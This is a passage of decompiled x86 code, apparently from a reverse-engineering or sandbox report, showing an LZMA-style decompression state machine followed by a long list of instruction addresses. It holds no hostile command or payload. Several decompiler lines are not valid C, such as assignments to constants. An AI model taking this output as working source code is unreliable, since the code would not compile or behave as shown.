                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													_t217 = __edx + 1; // 0x1
                                                          													__ebx = _t217;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													goto L60;
                                                          												} else {
                                                          													goto L58;
                                                          												}
                                                          											case 0x10:
                                                          												L109:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0x10;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t365 = __ebp - 0x70;
                                                          												 *_t365 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t365;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												goto L111;
                                                          											case 0x11:
                                                          												L68:
                                                          												_t614 =  *(_t621 - 0x58);
                                                          												 *(_t621 - 0x84) = 0x12;
                                                          												while(1) {
                                                          													L132:
                                                          													 *(_t621 - 0x54) = _t614;
                                                          													goto L133;
                                                          												}
                                                          											case 0x12:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 0x58);
                                                          													 *(__ebp - 0x84) = 0x13;
                                                          													__esi =  *(__ebp - 0x58) + 2;
                                                          													while(1) {
                                                          														L132:
                                                          														 *(_t621 - 0x54) = _t614;
                                                          														goto L133;
                                                          													}
                                                          												}
                                                          												__eax =  *(__ebp - 0x4c);
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          												__ecx =  *(__ebp - 0x58);
                                                          												__eax =  *(__ebp - 0x4c) << 4;
                                                          												__eflags = __eax;
                                                          												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          												goto L130;
                                                          											case 0x13:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													_t469 = __ebp - 0x58;
                                                          													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                          													__eflags =  *_t469;
                                                          													 *(__ebp - 0x30) = 0x10;
                                                          													 *(__ebp - 0x40) = 8;
                                                          													L144:
                                                          													 *(__ebp - 0x7c) = 0x14;
                                                          													goto L145;
                                                          												}
                                                          												__eax =  *(__ebp - 0x4c);
                                                          												__ecx =  *(__ebp - 0x58);
                                                          												__eax =  *(__ebp - 0x4c) << 4;
                                                          												 *(__ebp - 0x30) = 8;
                                                          												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                          												L130:
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												 *(__ebp - 0x40) = 3;
                                                          												goto L144;
                                                          											case 0x14:
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                          												__eax =  *(__ebp - 0x80);
                                                          												 *(_t621 - 0x88) = _t542;
                                                          												goto L1;
                                                          											case 0x15:
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          												__al = __al & 0x000000fd;
                                                          												__eax = (__eflags >= 0) - 1 + 0xb;
                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                          												goto L120;
                                                          											case 0x16:
                                                          												__eax =  *(__ebp - 0x30);
                                                          												__eflags = __eax - 4;
                                                          												if(__eax >= 4) {
                                                          													_push(3);
                                                          													_pop(__eax);
                                                          												}
                                                          												__ecx =  *(__ebp - 4);
                                                          												 *(__ebp - 0x40) = 6;
                                                          												__eax = __eax << 7;
                                                          												 *(__ebp - 0x7c) = 0x19;
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												goto L145;
                                                          											case 0x17:
                                                          												L145:
                                                          												__eax =  *(__ebp - 0x40);
                                                          												 *(__ebp - 0x50) = 1;
                                                          												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                          												goto L149;
                                                          											case 0x18:
                                                          												L146:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0x18;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t484 = __ebp - 0x70;
                                                          												 *_t484 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t484;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												L148:
                                                          												_t487 = __ebp - 0x48;
                                                          												 *_t487 =  *(__ebp - 0x48) - 1;
                                                          												__eflags =  *_t487;
                                                          												L149:
                                                          												__eflags =  *(__ebp - 0x48);
                                                          												if( *(__ebp - 0x48) <= 0) {
                                                          													__ecx =  *(__ebp - 0x40);
                                                          													__ebx =  *(__ebp - 0x50);
                                                          													0 = 1;
                                                          													__eax = 1 << __cl;
                                                          													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                          													__eax =  *(__ebp - 0x7c);
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          													while(1) {
                                                          														 *(_t621 - 0x88) = _t542;
                                                          														goto L1;
                                                          													}
                                                          												}
                                                          												__eax =  *(__ebp - 0x50);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__esi = __edx + __eax;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__ax =  *__esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													__cx = __ax >> 5;
                                                          													__eax = __eax - __ecx;
                                                          													__edx = __edx + 1;
                                                          													__eflags = __edx;
                                                          													 *__esi = __ax;
                                                          													 *(__ebp - 0x50) = __edx;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													goto L148;
                                                          												} else {
                                                          													goto L146;
                                                          												}
                                                          											case 0x19:
                                                          												__eflags = __ebx - 4;
                                                          												if(__ebx < 4) {
                                                          													 *(__ebp - 0x2c) = __ebx;
                                                          													L119:
                                                          													_t393 = __ebp - 0x2c;
                                                          													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                          													__eflags =  *_t393;
                                                          													L120:
                                                          													__eax =  *(__ebp - 0x2c);
                                                          													__eflags = __eax;
                                                          													if(__eax == 0) {
                                                          														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                          														goto L170;
                                                          													}
                                                          													__eflags = __eax -  *(__ebp - 0x60);
                                                          													if(__eax >  *(__ebp - 0x60)) {
                                                          														goto L171;
                                                          													}
                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                          													__eax =  *(__ebp - 0x30);
                                                          													_t400 = __ebp - 0x60;
                                                          													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                          													__eflags =  *_t400;
                                                          													goto L123;
                                                          												}
                                                          												__ecx = __ebx;
                                                          												__eax = __ebx;
                                                          												__ecx = __ebx >> 1;
                                                          												__eax = __ebx & 0x00000001;
                                                          												__ecx = (__ebx >> 1) - 1;
                                                          												__al = __al | 0x00000002;
                                                          												__eax = (__ebx & 0x00000001) << __cl;
                                                          												__eflags = __ebx - 0xe;
                                                          												 *(__ebp - 0x2c) = __eax;
                                                          												if(__ebx >= 0xe) {
                                                          													__ebx = 0;
                                                          													 *(__ebp - 0x48) = __ecx;
                                                          													L102:
                                                          													__eflags =  *(__ebp - 0x48);
                                                          													if( *(__ebp - 0x48) <= 0) {
                                                          														__eax = __eax + __ebx;
                                                          														 *(__ebp - 0x40) = 4;
                                                          														 *(__ebp - 0x2c) = __eax;
                                                          														__eax =  *(__ebp - 4);
                                                          														__eax =  *(__ebp - 4) + 0x644;
                                                          														__eflags = __eax;
                                                          														L108:
                                                          														__ebx = 0;
                                                          														 *(__ebp - 0x58) = __eax;
                                                          														 *(__ebp - 0x50) = 1;
                                                          														 *(__ebp - 0x44) = 0;
                                                          														 *(__ebp - 0x48) = 0;
                                                          														L112:
                                                          														__eax =  *(__ebp - 0x40);
                                                          														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                          															_t391 = __ebp - 0x2c;
                                                          															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                          															__eflags =  *_t391;
                                                          															goto L119;
                                                          														}
                                                          														__eax =  *(__ebp - 0x50);
                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          														__eax =  *(__ebp - 0x58);
                                                          														__esi = __edi + __eax;
                                                          														 *(__ebp - 0x54) = __esi;
                                                          														__ax =  *__esi;
                                                          														__ecx = __ax & 0x0000ffff;
                                                          														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                          														__eflags =  *(__ebp - 0xc) - __edx;
                                                          														if( *(__ebp - 0xc) >= __edx) {
                                                          															__ecx = 0;
                                                          															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                          															__ecx = 1;
                                                          															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                          															__ebx = 1;
                                                          															__ecx =  *(__ebp - 0x48);
                                                          															__ebx = 1 << __cl;
                                                          															__ecx = 1 << __cl;
                                                          															__ebx =  *(__ebp - 0x44);
                                                          															__ebx =  *(__ebp - 0x44) | __ecx;
                                                          															__cx = __ax;
                                                          															__cx = __ax >> 5;
                                                          															__eax = __eax - __ecx;
                                                          															__edi = __edi + 1;
                                                          															__eflags = __edi;
                                                          															 *(__ebp - 0x44) = __ebx;
                                                          															 *__esi = __ax;
                                                          															 *(__ebp - 0x50) = __edi;
                                                          														} else {
                                                          															 *(__ebp - 0x10) = __edx;
                                                          															0x800 = 0x800 - __ecx;
                                                          															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          															 *__esi = __dx;
                                                          														}
                                                          														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          														if( *(__ebp - 0x10) >= 0x1000000) {
                                                          															L111:
                                                          															_t368 = __ebp - 0x48;
                                                          															 *_t368 =  *(__ebp - 0x48) + 1;
                                                          															__eflags =  *_t368;
                                                          															goto L112;
                                                          														} else {
                                                          															goto L109;
                                                          														}
                                                          													}
                                                          													__ecx =  *(__ebp - 0xc);
                                                          													__ebx = __ebx + __ebx;
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                          													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                          														__ecx =  *(__ebp - 0x10);
                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          														__ebx = __ebx | 0x00000001;
                                                          														__eflags = __ebx;
                                                          														 *(__ebp - 0x44) = __ebx;
                                                          													}
                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                          														L101:
                                                          														_t338 = __ebp - 0x48;
                                                          														 *_t338 =  *(__ebp - 0x48) - 1;
                                                          														__eflags =  *_t338;
                                                          														goto L102;
                                                          													} else {
                                                          														goto L99;
                                                          													}
                                                          												}
                                                          												__edx =  *(__ebp - 4);
                                                          												__eax = __eax - __ebx;
                                                          												 *(__ebp - 0x40) = __ecx;
                                                          												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                          												goto L108;
                                                          											case 0x1a:
                                                          												L56:
                                                          												__eflags =  *(__ebp - 0x64);
                                                          												if( *(__ebp - 0x64) == 0) {
                                                          													 *(__ebp - 0x88) = 0x1a;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x68);
                                                          												__al =  *(__ebp - 0x5c);
                                                          												__edx =  *(__ebp - 8);
                                                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          												 *( *(__ebp - 0x68)) = __al;
                                                          												__ecx =  *(__ebp - 0x14);
                                                          												 *(__ecx +  *(__ebp - 8)) = __al;
                                                          												__eax = __ecx + 1;
                                                          												__edx = 0;
                                                          												_t192 = __eax %  *(__ebp - 0x74);
                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                          												__edx = _t192;
                                                          												goto L79;
                                                          											case 0x1b:
                                                          												L75:
                                                          												__eflags =  *(__ebp - 0x64);
                                                          												if( *(__ebp - 0x64) == 0) {
                                                          													 *(__ebp - 0x88) = 0x1b;
                                                          													goto L170;
                                                          												}
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__edx =  *(__ebp - 8);
                                                          												__cl =  *(__eax + __edx);
                                                          												__eax =  *(__ebp - 0x14);
                                                          												 *(__ebp - 0x5c) = __cl;
                                                          												 *(__eax + __edx) = __cl;
                                                          												__eax = __eax + 1;
                                                          												__edx = 0;
                                                          												_t274 = __eax %  *(__ebp - 0x74);
                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                          												__edx = _t274;
                                                          												__eax =  *(__ebp - 0x68);
                                                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          												_t283 = __ebp - 0x64;
                                                          												 *_t283 =  *(__ebp - 0x64) - 1;
                                                          												__eflags =  *_t283;
                                                          												 *( *(__ebp - 0x68)) = __cl;
                                                          												L79:
                                                          												 *(__ebp - 0x14) = __edx;
                                                          												goto L80;
                                                          											case 0x1c:
                                                          												while(1) {
                                                          													L123:
                                                          													__eflags =  *(__ebp - 0x64);
                                                          													if( *(__ebp - 0x64) == 0) {
                                                          														break;
                                                          													}
                                                          													__eax =  *(__ebp - 0x14);
                                                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          													__eflags = __eax -  *(__ebp - 0x74);
                                                          													if(__eax >=  *(__ebp - 0x74)) {
                                                          														__eax = __eax +  *(__ebp - 0x74);
                                                          														__eflags = __eax;
                                                          													}
                                                          													__edx =  *(__ebp - 8);
                                                          													__cl =  *(__eax + __edx);
                                                          													__eax =  *(__ebp - 0x14);
                                                          													 *(__ebp - 0x5c) = __cl;
                                                          													 *(__eax + __edx) = __cl;
                                                          													__eax = __eax + 1;
                                                          													__edx = 0;
                                                          													_t414 = __eax %  *(__ebp - 0x74);
                                                          													__eax = __eax /  *(__ebp - 0x74);
                                                          													__edx = _t414;
                                                          													__eax =  *(__ebp - 0x68);
                                                          													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                          													__eflags =  *(__ebp - 0x30);
                                                          													 *( *(__ebp - 0x68)) = __cl;
                                                          													 *(__ebp - 0x14) = _t414;
                                                          													if( *(__ebp - 0x30) > 0) {
                                                          														continue;
                                                          													} else {
                                                          														L80:
                                                          														 *(__ebp - 0x88) = 2;
                                                          														goto L1;
                                                          													}
                                                          												}
                                                          												 *(__ebp - 0x88) = 0x1c;
                                                          												goto L170;
                                                          										}
                                                          									}
                                                          									L171:
                                                          									_t544 = _t543 | 0xffffffff;
                                                          									goto L172;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					goto L1;
                                                          				}
                                                          			}














                                                          0x00000000
                                                          0x00406ffe
                                                          0x00406ffe
                                                          0x00407002
                                                          0x00407023
                                                          0x0040702a
                                                          0x00407030
                                                          0x00407036
                                                          0x00407048
                                                          0x0040704e
                                                          0x00407053
                                                          0x00000000
                                                          0x00407004
                                                          0x0040700a
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073d4
                                                          0x004073da
                                                          0x004073e0
                                                          0x004073fa
                                                          0x004073fd
                                                          0x00407403
                                                          0x0040740e
                                                          0x00407410
                                                          0x004073e2
                                                          0x004073e2
                                                          0x004073f1
                                                          0x004073f5
                                                          0x004073f5
                                                          0x0040741a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040741c
                                                          0x00407420
                                                          0x004075cf
                                                          0x004075e5
                                                          0x004075ed
                                                          0x004075f4
                                                          0x004075f6
                                                          0x004075fd
                                                          0x00407601
                                                          0x00407601
                                                          0x0040742c
                                                          0x00407433
                                                          0x0040743b
                                                          0x0040743e
                                                          0x00407441
                                                          0x00407441
                                                          0x00407447
                                                          0x00407447
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406bec
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x00000000
                                                          0x00406bfd
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c06
                                                          0x00406c09
                                                          0x00406c0c
                                                          0x00406c10
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c16
                                                          0x00406c19
                                                          0x00406c1b
                                                          0x00406c1c
                                                          0x00406c1f
                                                          0x00406c21
                                                          0x00406c22
                                                          0x00406c24
                                                          0x00406c27
                                                          0x00406c2c
                                                          0x00406c31
                                                          0x00406c3a
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00406c5c
                                                          0x00406c84
                                                          0x00406c86
                                                          0x00406c94
                                                          0x00406c94
                                                          0x00406c98
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c88
                                                          0x00406c8b
                                                          0x00406c8c
                                                          0x00406c8c
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c62
                                                          0x00406c67
                                                          0x00406c67
                                                          0x00406c70
                                                          0x00406c78
                                                          0x00406c7b
                                                          0x00000000
                                                          0x00406c81
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c9e
                                                          0x00406c9e
                                                          0x00406ca2
                                                          0x0040754e
                                                          0x00000000
                                                          0x0040754e
                                                          0x00406cab
                                                          0x00406cbb
                                                          0x00406cbe
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc4
                                                          0x00406cc8
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cca
                                                          0x00406cd0
                                                          0x00406cfa
                                                          0x00406d00
                                                          0x00406d07
                                                          0x00000000
                                                          0x00406d07
                                                          0x00406cd6
                                                          0x00406cd9
                                                          0x00406cde
                                                          0x00406cde
                                                          0x00406ce9
                                                          0x00406cf1
                                                          0x00406cf4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d39
                                                          0x00406d3f
                                                          0x00406d42
                                                          0x00406d4f
                                                          0x00406d57
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d0e
                                                          0x00406d0e
                                                          0x00406d12
                                                          0x0040755d
                                                          0x00000000
                                                          0x0040755d
                                                          0x00406d1e
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d2c
                                                          0x00406d2f
                                                          0x00406d32
                                                          0x00406d37
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073d4
                                                          0x004073da
                                                          0x004073e0
                                                          0x004073fa
                                                          0x004073fd
                                                          0x00407403
                                                          0x0040740e
                                                          0x00407410
                                                          0x004073e2
                                                          0x004073e2
                                                          0x004073f1
                                                          0x004073f5
                                                          0x004073f5
                                                          0x0040741a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d5f
                                                          0x00406d61
                                                          0x00406d64
                                                          0x00406dd5
                                                          0x00406dd8
                                                          0x00406ddb
                                                          0x00406de2
                                                          0x00406dec
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x00406d66
                                                          0x00406d6a
                                                          0x00406d6d
                                                          0x00406d6f
                                                          0x00406d72
                                                          0x00406d75
                                                          0x00406d77
                                                          0x00406d7a
                                                          0x00406d7c
                                                          0x00406d81
                                                          0x00406d84
                                                          0x00406d87
                                                          0x00406d8b
                                                          0x00406d92
                                                          0x00406d95
                                                          0x00406d9c
                                                          0x00406da0
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406dac
                                                          0x00406daf
                                                          0x00406dcd
                                                          0x00406dcf
                                                          0x00000000
                                                          0x00406db1
                                                          0x00406db1
                                                          0x00406db4
                                                          0x00406db7
                                                          0x00406dba
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbf
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc5
                                                          0x00406dc8
                                                          0x00000000
                                                          0x00406dc8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407068
                                                          0x0040706c
                                                          0x0040708f
                                                          0x00407092
                                                          0x00407095
                                                          0x0040709f
                                                          0x0040706e
                                                          0x0040706e
                                                          0x00407071
                                                          0x00407074
                                                          0x00407077
                                                          0x00407084
                                                          0x00407087
                                                          0x00407087
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x00000000
                                                          0x004070ab
                                                          0x004070af
                                                          0x00000000
                                                          0x00000000
                                                          0x004070b5
                                                          0x004070b9
                                                          0x00000000
                                                          0x00000000
                                                          0x004070bf
                                                          0x004070c1
                                                          0x004070c5
                                                          0x004070c5
                                                          0x004070c8
                                                          0x004070cc
                                                          0x00000000
                                                          0x00000000
                                                          0x0040711c
                                                          0x00407120
                                                          0x00407127
                                                          0x0040712a
                                                          0x0040712d
                                                          0x00407137
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00407122
                                                          0x00000000
                                                          0x00000000
                                                          0x00407143
                                                          0x00407147
                                                          0x0040714e
                                                          0x00407151
                                                          0x00407154
                                                          0x00407149
                                                          0x00407149
                                                          0x00407149
                                                          0x00407157
                                                          0x0040715a
                                                          0x0040715d
                                                          0x0040715d
                                                          0x00407160
                                                          0x00407163
                                                          0x00407166
                                                          0x00407166
                                                          0x00407169
                                                          0x00407170
                                                          0x00407175
                                                          0x00000000
                                                          0x00000000
                                                          0x00407203
                                                          0x00407203
                                                          0x00407207
                                                          0x004075a5
                                                          0x00000000
                                                          0x004075a5
                                                          0x0040720d
                                                          0x00407210
                                                          0x00407213
                                                          0x00407217
                                                          0x0040721a
                                                          0x00407220
                                                          0x00407222
                                                          0x00407222
                                                          0x00407222
                                                          0x00407225
                                                          0x00407228
                                                          0x00000000
                                                          0x00000000
                                                          0x00406df8
                                                          0x00406df8
                                                          0x00406dfc
                                                          0x00407569
                                                          0x00000000
                                                          0x00407569
                                                          0x00406e02
                                                          0x00406e05
                                                          0x00406e08
                                                          0x00406e0c
                                                          0x00406e0f
                                                          0x00406e15
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e1a
                                                          0x00406e1d
                                                          0x00406e1d
                                                          0x00406e20
                                                          0x00406e23
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e29
                                                          0x00406e2f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e35
                                                          0x00406e35
                                                          0x00406e39
                                                          0x00406e3c
                                                          0x00406e3f
                                                          0x00406e42
                                                          0x00406e45
                                                          0x00406e46
                                                          0x00406e49
                                                          0x00406e4b
                                                          0x00406e51
                                                          0x00406e54
                                                          0x00406e57
                                                          0x00406e5a
                                                          0x00406e5d
                                                          0x00406e60
                                                          0x00406e63
                                                          0x00406e7f
                                                          0x00406e82
                                                          0x00406e85
                                                          0x00406e88
                                                          0x00406e8f
                                                          0x00406e93
                                                          0x00406e95
                                                          0x00406e99
                                                          0x00406e65
                                                          0x00406e65
                                                          0x00406e69
                                                          0x00406e71
                                                          0x00406e76
                                                          0x00406e78
                                                          0x00406e7a
                                                          0x00406e7a
                                                          0x00406e9c
                                                          0x00406ea3
                                                          0x00406ea6
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eb1
                                                          0x00406eb1
                                                          0x00406eb5
                                                          0x00407575
                                                          0x00000000
                                                          0x00407575
                                                          0x00406ebb
                                                          0x00406ebe
                                                          0x00406ec1
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ece
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed3
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406edc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ede
                                                          0x00406ee1
                                                          0x00406ee4
                                                          0x00406ee7
                                                          0x00406eea
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef3
                                                          0x00406ef6
                                                          0x00406ef9
                                                          0x00406efc
                                                          0x00406f14
                                                          0x00406f17
                                                          0x00406f1a
                                                          0x00406f1d
                                                          0x00406f1d
                                                          0x00406f20
                                                          0x00406f24
                                                          0x00406f26
                                                          0x00406efe
                                                          0x00406efe
                                                          0x00406f06
                                                          0x00406f0b
                                                          0x00406f0d
                                                          0x00406f0f
                                                          0x00406f0f
                                                          0x00406f29
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00000000
                                                          0x00406f35
                                                          0x00000000
                                                          0x00406f35
                                                          0x00406f33
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f75
                                                          0x00406f75
                                                          0x00406f79
                                                          0x00407581
                                                          0x00000000
                                                          0x00407581
                                                          0x00406f7f
                                                          0x00406f82
                                                          0x00406f85
                                                          0x00406f89
                                                          0x00406f8c
                                                          0x00406f92
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f97
                                                          0x00406f9a
                                                          0x00406f9a
                                                          0x00406fa0
                                                          0x00406f3e
                                                          0x00406f3e
                                                          0x00406f41
                                                          0x00000000
                                                          0x00406f41
                                                          0x00406fa2
                                                          0x00406fa2
                                                          0x00406fa5
                                                          0x00406fa8
                                                          0x00406fab
                                                          0x00406fae
                                                          0x00406fb1
                                                          0x00406fb4
                                                          0x00406fb7
                                                          0x00406fba
                                                          0x00406fbd
                                                          0x00406fc0
                                                          0x00406fd8
                                                          0x00406fdb
                                                          0x00406fde
                                                          0x00406fe1
                                                          0x00406fe1
                                                          0x00406fe4
                                                          0x00406fe8
                                                          0x00406fea
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fca
                                                          0x00406fcf
                                                          0x00406fd1
                                                          0x00406fd3
                                                          0x00406fd3
                                                          0x00406fed
                                                          0x00406ff4
                                                          0x00406ff7
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00000000
                                                          0x00406ff9
